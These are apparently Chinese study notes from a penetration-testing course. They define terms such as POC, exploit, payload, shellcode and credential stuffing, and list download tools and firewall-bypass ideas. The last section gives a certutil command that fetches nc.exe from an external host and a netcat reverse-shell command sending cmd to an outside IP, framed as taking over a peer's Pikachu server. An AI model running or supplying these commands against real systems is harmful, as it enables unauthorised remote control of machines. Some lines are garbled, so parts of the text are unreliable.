目录
#结合案例2:学会了有手就行-Fofa拿下同行Pikachu服务器
名词解释
Poc、EXP、Payload与shellcode
POC:全称'Proof of Concept',中文'概念验证',常指一段漏洞证明的代码,
EXP:全称'Exploit',中文‘利用',指利用系统漏洞进行攻击的动作。
Payload:中文'有效载荷',指成功exploit之后,真正在目标系统执行的代码或指今。
Shellcode:简单翻译'shell代码',是Payload的一种,由于其建立正向/反向shell而得名。
poc是验证代码,看漏洞是否存在。exp是利用代码,是关键。
后门
webshow是指网站一类的后门。
木马、病毒
木马是控制电脑,病毒就是纯破坏性。
黑白盒测试
黑盒就是无法得到源代码时进行测试。
社会工程学、撞库
社会工程学就是通过人而不是程序,撞库就是收集某些公式泄露的数据,通过这些数据去尝试这些用户的其他账户。
ATT&CK
就是一些漏洞的专有名词,可以在写报告的时候用上。
应用实例
实用案例1:文件上传下载-解决无图形化&解决数据传输
在上传和下载文件时,很多时候我们没有图形化界面,这时就需要使用相应的指令在对应的系统中进行下载。
Linux:wget curl python ruby perl java
linux一般是wget和curl命令进行下载
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundl132
windows一般使用powershell命令进行下载。
实用案例2:反弹shell命令-解决数据回显&解决数据通讯
反弹是指将权限移动到了另一个地方。
解决数据回显:就是指我们发射攻击的东西后,对方回给我们一个反馈,告诉我们成功了没有。
useradd用户名passwd用户名
交互式就是我们输入一个命令后,系统会等待我们的输入。
测试linux系统添加用户或修改密码命令交互回显问题。
我们能管理外网,但外网不能直接管理我们,因为外网不能直接锁定到内网具体是哪一个用户。
结合案例1:防火墙绕过-正向连接&反向连接&内网服务器
防火墙对入站检测严格,出站检测宽松。
比如windows主机和一个linux主机,只有windows主机开了防火墙,那么可以从windows主机交出数据给linux,此时为出站。碰到防火墙,尽量让对方主动找我们,而不是我们去找他。
#结合案例2:学会了有手就行-Fofa拿下同行Pikachu服务器
pikachu是一个靶场,上面有很多漏洞。
文件下载&反弹shell:
certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe
nc-ecmd47.75.212.1555566
